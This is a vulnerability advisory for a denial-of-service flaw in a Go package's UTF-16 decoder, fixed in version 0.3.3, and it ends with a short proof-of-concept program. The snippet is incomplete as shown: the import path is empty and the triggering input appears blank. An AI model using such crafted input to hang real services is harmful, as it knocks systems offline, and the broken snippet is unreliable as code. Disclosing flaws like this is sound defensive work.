Denial of Service (DoS) Affecting package, versions <0.3.3

  • Exploit Maturity

    Proof of concept

  • Attack Complexity


  • Availability


  • snyk-id


  • published

    3 Sep 2020

  • disclosed

    9 Jun 2020

  • credit

    Evgeny Kapun

How to fix?

Upgrade to version 0.3.3 or higher.

Overview

This is a Unicode package that provides Unicode encodings such as UTF-16.

Affected versions of this package are vulnerable to Denial of Service (DoS). The UTF-16 decoder can be made to enter an infinite loop, causing the program to crash or run out of memory.


package main

import (
	"fmt"
	""
)

func main() {
	// Decode the input with a big-endian UTF-16 decoder that honours a BOM.
	res, err := unicode.UTF16(unicode.BigEndian, unicode.UseBOM).NewDecoder().String(" ")
	fmt.Println(res, err)
}